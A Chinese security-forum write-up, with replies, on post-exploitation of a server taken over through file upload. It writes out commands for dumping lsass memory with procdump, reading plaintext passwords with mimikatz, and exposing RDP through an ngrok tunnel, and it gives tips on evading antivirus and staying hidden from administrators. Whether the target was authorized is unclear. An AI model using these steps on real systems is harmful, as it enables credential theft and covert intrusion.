用户
搜索
  • TA的每日心情
    开心
    2018-9-24 19:57
  • 签到天数: 23 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    8

    主题

    35

    帖子

    540

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2017-7-28

    i春秋签约作者

    发表于 2018-9-21 15:35:43 18021625

    前言

    最近闲的时候在搞指定目标“测试”,在拿到目标后,经过广泛的信息收集,找到一个脆弱站点,拿下目标边界一台服务器(文件上传)。虽然直接是system权限,但是想连入目标远程桌面进行更深层次的信息收集,然而却遇到各种问题,做个笔记记录下。

    0x01 知识点一

    拿下目标shell后发现直接是system权限。

    system权限虽然说可以干各种各样的事,但是个人一般不会随随便便去新建账户或者改密码,这样很容易被管理员发现。这里我选择的是传一个msf码子弹个meterpreter sessions回来。然而码子一传上去就被杀了,tasklist /svc发现可疑进程查询后得知是一款趋势科技的杀软。kill pid结束不掉,怎么办?免杀呗。经过免杀处理后能成功上传,正向反向都试了一遍,但是session还是始终弹不回来。大概就是下面这个样子,始终到不了ESTABLISHED状态。由于之前没保存图,又懒得再去搞一遍就这么描述一下吧。<br>这里我讲一下为什么我想弹meterpreter回来。主要是为了方便打内网和读密码。既然msf行不通那就只能变换思路。怎么办呢?无奈,只好去新建一个隐藏账户了,然而问题又来了,虽然执行命令没回显基本上是成功了,但是最后去连3389显示用户不存在。<br>是什么原因导致这种情况,我们把原因归结到杀软上,以为可能是杀软限制了执行与用户相关操作的命令,实际原因等我们最后登录上3389后发现并不是,这里是一个坑,还有怎么登上3389的文章最后再提。咋办?传mimikatz?失败,传不上。然后队友想到了一个好办法,mimikatz是从内存中读密码的。那么我们能不能把它的内存给导出来?最后找到一款绝对免杀的工具(微软官方工具)prodump,上传prodump.exe执行命令prodump.exe -accepteula -ma lsass.exe lsass.dmp成功导出内存。<br><br><br>下载到本地用mimikatz读取。把lsass.dmp放到mimikatz目录下,执行命令sekurlsa::minidmp lsass.dmpsekurlsa::logonPasswords full即可读出密码。直接读出了明文密码。

    0X02 知识点二

    密码拿到了,连接3389试一下。然而,他只允许内网连接,尝试了用正向代理的方式,没成功,最后用了一款反向代理工具ngrok直接把它3389映射了出来。
    <br>
    ngrok需要到它的官网用邮箱注册,因为他实际上并不会验证,推荐使用临时邮箱。将ngrok上传到目标主机上。首先到ngrok官网上找到你的token。
    <br>
    然后在目标主机上执行命令ngrok.exe authtoken your token
    <br>
    然后在执行ngrok.exe tcp 3389即可,现在它的3389已经映射出来了。可以直接连接了,在连接之前要先查询下管理员是否在线使用命令quser即可。
    如果在线的话,贸然登录会把管理员给挤下去很容易被发现。这里我就贴一张之前登录成功的图吧。<br>连接3389的方式,进入你的ngrok找到status复制里面的URL即可。

    0x03 写在后面的话


    游客,如果您要查看本帖隐藏内容请回复

    评分

    参与人数 1魔法币 +5 收起 理由
    zzconfig + 5 感谢发布原创作品,i春秋论坛因你更精彩!.

    查看全部评分

    感谢楼主精彩的文章,我个人在做渗透测试的时候更多的时候不会提权服务器,因为我们的目的不是拿下服务器,而是找到漏洞提醒管理员帮助他们修复漏洞,这应该是一个合格的白帽子应该做的事
    使用道具 举报 回复
    NB                                      
    使用道具 举报 回复
    初来乍到01 发表于 2018-9-21 20:42
    感谢楼主精彩的文章,我个人在做渗透测试的时候更多的时候不会提权服务器,因为我们的目的不是拿下服务器, ...

    什么鬼 提权不也是漏洞?
    使用道具 举报 回复
    初来乍到01 发表于 2018-9-21 20:42
    感谢楼主精彩的文章,我个人在做渗透测试的时候更多的时候不会提权服务器,因为我们的目的不是拿下服务器, ...

    有道理的
    使用道具 举报 回复
    zzconfig 发表于 2018-9-21 16:14
    3389这招 帖子没看就打赏了!应该打赏10个魔法币!
    表哥帖子可以收藏到博客吗 ...

    没问题
    使用道具 举报 回复
    补丁打满,想提权基本是不可能了。转换思路,查找敏感信息,因为这是一个大目标,提权不是必须不一定非得陷在这里
    使用道具 举报 回复
    大雕饥渴难耐 发表于 2018-9-22 21:31
    用的什么工具链接的啊 ,不像一句话的样子呀

    兄弟 大马了解一下
    使用道具 举报 回复
    66666666666666666666666666666666666666666666666666666666666666666666666666666
    使用道具 举报 回复
    3389这招 帖子没看就打赏了!应该打赏10个魔法币!
    表哥帖子可以收藏到博客吗
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫流光 这个网络他曾来过。
    使用道具 举报 回复
    发表于 2018-9-21 16:20:16
    学习了大老的思路
    使用道具 举报 回复
    发表于 2018-9-21 16:21:41
    姿势不错。。。
    http://www.anonymou5.com
    使用道具 举报 回复
    发表于 2018-9-21 16:23:59
    不错不错
    使用道具 举报 回复
    发表于 2018-9-21 16:50:42
    大佬6666  学习膜拜
    使用道具 举报 回复
    发表于 2018-9-21 16:54:13
    66666666666666
    使用道具 举报 回复
    发表于 2018-9-21 17:11:41
    学习一下~
    使用道具 举报 回复
    发表于 2018-9-21 17:19:39
    非常精彩
    使用道具 举报 回复
    看看啥玩意
    使用道具 举报 回复
    发表于 2018-9-21 17:30:17
    学习一下~
    使用道具 举报 回复
    发表于 2018-9-21 17:57:02
    6666666666666666666666
    使用道具 举报 回复
    发表于 2018-9-21 18:08:27
    围观大佬
    使用道具 举报 回复
    发表于 2018-9-21 18:48:06
    来看看。。。
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册